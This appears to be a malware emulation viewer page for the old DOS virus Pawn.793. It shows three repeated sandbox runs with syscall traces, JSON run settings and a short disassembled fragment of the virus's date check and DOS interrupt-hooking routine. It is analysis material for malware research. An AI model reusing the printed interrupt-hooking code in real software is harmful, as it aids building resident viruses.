Sample viewer

vx.netlux.org/Virus.DOS.Pawn.793

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:48:43.748868659Z 243 PC: 13e82 | UNKNOWN!
2018-12-17T22:48:43.750246903Z 42 PC: 13ed6 | Get date
0x13ed6: cmp dh, 0xa
0x13ed9: jne 0x13ee2
0x13edb: cmp al, 0x13
0x13edd: jne 0x13ee2
0x13edf: jmp 0x140c5
0x13ee2: xor ax, ax
0x13ee4: mov ds, ax
0x13ee6: mov ax, word ptr [0x84]
0x13ee9: mov bx, word ptr [0x86]
0x13eed: mov word ptr es:[0x401], ax
0x13ef1: mov word ptr es:[0x403], bx
0x13ef6: cli
0x13ef7: mov word ptr [0x84], 0x24e
0x13efd: mov word ptr [0x86], es
0x13f01: sti
0x13f02: push cs
0x13f03: pop es
0x13f04: jmp 0x13e8a
0x13f06: inc word ptr cs:[0x20e]
0x13f0b: cmp word ptr cs:[0x20e], 0x1554
2018-12-17T22:48:43.759038647Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T22:48:43.76528586Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9650,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:22.605270104Z 243 PC: 13e82 | UNKNOWN!
2018-12-25T12:23:22.606435786Z 42 PC: 13ed6 | Get date
0x13ed6: cmp dh, 0xa
0x13ed9: jne 0x13ee2
0x13edb: cmp al, 0x13
0x13edd: jne 0x13ee2
0x13edf: jmp 0x140c5
0x13ee2: xor ax, ax
0x13ee4: mov ds, ax
0x13ee6: mov ax, word ptr [0x84]
0x13ee9: mov bx, word ptr [0x86]
0x13eed: mov word ptr es:[0x401], ax
0x13ef1: mov word ptr es:[0x403], bx
0x13ef6: cli
0x13ef7: mov word ptr [0x84], 0x24e
0x13efd: mov word ptr [0x86], es
0x13f01: sti
0x13f02: push cs
0x13f03: pop es
0x13f04: jmp 0x13e8a
0x13f06: inc word ptr cs:[0x20e]
0x13f0b: cmp word ptr cs:[0x20e], 0x1554
2018-12-25T12:23:22.618602889Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:23:22.623882993Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9650,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:22.73888514Z 243 PC: 13e82 | UNKNOWN!
2018-12-25T12:23:22.740228318Z 42 PC: 13ed6 | Get date
0x13ed6: cmp dh, 0xa
0x13ed9: jne 0x13ee2
0x13edb: cmp al, 0x13
0x13edd: jne 0x13ee2
0x13edf: jmp 0x140c5
0x13ee2: xor ax, ax
0x13ee4: mov ds, ax
0x13ee6: mov ax, word ptr [0x84]
0x13ee9: mov bx, word ptr [0x86]
0x13eed: mov word ptr es:[0x401], ax
0x13ef1: mov word ptr es:[0x403], bx
0x13ef6: cli
0x13ef7: mov word ptr [0x84], 0x24e
0x13efd: mov word ptr [0x86], es
0x13f01: sti
0x13f02: push cs
0x13f03: pop es
0x13f04: jmp 0x13e8a
0x13f06: inc word ptr cs:[0x20e]
0x13f0b: cmp word ptr cs:[0x20e], 0x1554
2018-12-25T12:23:22.742352523Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:23:22.747577635Z 0 PC: 12a89 | Program terminate